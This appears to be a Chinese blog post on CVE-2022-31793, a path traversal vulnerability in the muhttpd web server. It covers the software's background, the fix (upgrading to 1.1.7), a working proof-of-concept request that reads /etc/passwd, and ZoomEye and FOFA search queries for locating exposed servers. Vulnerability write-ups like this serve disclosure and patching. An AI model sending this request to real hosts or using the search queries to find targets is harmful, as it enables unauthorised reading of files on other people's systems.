[CVE-2022-31793]muhttpd 路径遍历漏洞

一、软件背景

muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。

muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件。

二、漏洞触发点

根据互联网上的POC脚本:

script/CVE-2022-31793.yaml at 473e7c60324a91b63579fc4a0a39ef66668f5696 · badboycxcc/script · GitHub

可以解析出POC:

GET a/etc/passwd HTTP/1.1
Host: XXX.XXX.XXX.XXX

其中,uri首字符可以为任意字母、数字,但只能写1个。后面的路径可以为任意Linux文件路径,直接返回读取的文件内容。

三、搜索语法 

muhttpd国内用户不多,主要为国外用户。

zoomeye搜索语法:

"Block11.gif"

FOfa搜索语法:

'body="Block11.gif" || cert.subject="dsldevice.domain_not_set.invalid"'

四、漏洞修复

升级软件至1.1.7。

版本1.1.7是解决以下问题的错误修复版本:

解析和处理HTTP请求时存在大量错误。

配置解析器中的越界读取,可通过巧尽心思构建的配置文件触发。

添加了一个测试套件,涵盖了一些基本功能,以及过去的HTTP请求处理错误。

为do_ request的原型添加了缺少的参数。

http://inglorion.net/software/muhttpd/

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值